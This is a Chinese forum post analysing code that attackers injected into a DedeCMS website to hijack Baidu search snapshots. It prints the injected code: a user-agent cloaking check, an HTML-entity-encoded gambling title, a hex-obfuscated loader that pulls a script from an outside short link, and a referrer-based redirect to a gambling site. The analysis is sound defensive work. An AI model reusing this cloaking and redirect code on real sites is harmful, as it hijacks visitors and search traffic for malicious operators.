请选择 进入手机版 | 继续访问电脑版
搜索
热搜: 活动 交友 discuz
查看: 476|回复: 0

百度快照劫持代码实战分析

[复制链接]

30

主题

31

帖子

159

积分

超级版主

Rank: 8Rank: 8

积分
159
发表于 2020-8-2 23:48:31 | 显示全部楼层 |阅读模式
本帖最后由 Jimoy 于 2020-8-2 23:51 编辑

百度快照劫持大家应该都听过,但具体是怎么回事呢?今天给大家讲一下。
有个朋友的站,是用dedecms做的,不得不吐槽一下,DEDECMS果然是漏洞百出,然后被HACK插入了代码。今天我们来分析这几行代码,比较简单,也很容易学会。
【1】<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title = "{dede:global.cfg_webname/}"}</script>
大家来看这段JS,JS里面包含一个判断,是根据什么判断呢,这是是根据userAgent来判断,如果不是百度来的,那就显示dedecms本身的标题,所以这也就是为什么我们直接打开网页,(输入网址的方式打开)而显示正常标题的原因。
【2】<title>&#22825;&#27941;&#26102;&#26102;&#24425;&#44;&#22825;
&#27941;&#26102;&#26102;&#24425;&#35268;&#21017;&#44;&#22825;
&#27941;&#26102;&#26102;&#24425;&#29609;&#27861;&#44;&#22825;
&#27941;&#26102;&#26102;&#24425;&#31283;&#36194;&#26041;&#26696;
&#45;&#24425;&#20048;&#22253;</title>
  
再来看这三行代码,这三行代码好像看不懂,他采用的是Unicode编码,解码以后,是“天津时时彩,天津时时彩规则,天津时时彩玩法,天津时时彩稳赢方案-彩乐园”这一行代码,搞懂了。
【3】
  1. <script type="text/javascript">
  2. window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"] ('
  3. \x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a
  4. \x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x
  5. 72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x74\x2e\x63\x6e\x2f\x52\x6e\x
  6. 59\x30\x68\x4c\x6c\x22\x3e\x3c\x2
  7. f\x73\x63\x72\x69\x70\x74\x3e');
  8. </script>
复制代码
解密出来就是这段话:
  1. < script type = "text/javascript" > window["document"]["write"]('<script type="text/javascript" src="http://t.cn/RnY0hLl"></script>'); < /script>
复制代码
意思是向首页中插入这行代码

那为什么还是会跳转呢?就是这行代码的事,这个转代码其实是向原网页插入一JS JS原地址 :  
http://SEO268.su.bcebos.com/cly.js

而JS的内容是如下内容:
  1. document.writeln("<script LANGUAGE=\'Javascript\'>");
  2. document.writeln("var s=document.referrer");
  3. document.writeln("if(s.indexOf(\'baidu\')>0 || s.indexOf(\'sogou\')>0 || s.indexOf(\'soso\')>0 ||s.indexOf(\'
  4. sm\')>0 ||s.indexOf(\'uc\')>0 ||s.indexOf(\'bing\')>0 ||s.indexOf(\'yahoo\')>0 ||s.indexOf(\'so\')>0 ||s.indexOf(\'google\')>0)");
  5. document.writeln("location.href=\'http://t.cn/RnYpcMt\';");
  6. document.writeln("</script>");
  7. document.writeln("");
  8. document.writeln("");
复制代码

说是百度快照 劫持,其实只要是搜索引擎来的都会劫持。跳转到另一个短网址,而短网址解密出来:http://www.caileyuan.cc
就是这个BC网站,这些黑客真是煞费苦心。

回复

使用道具 举报

高级模式
B Color Image Link Quote Code Smilies

本版积分规则

Archiver|手机版|小黑屋|IT趣-GEEK社区

GMT+8, 2022-5-16 19:02 , Processed in 0.109175 second(s), 19 queries .

Powered by Discuz! X3.4. 技术支持 by 巅峰设计

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表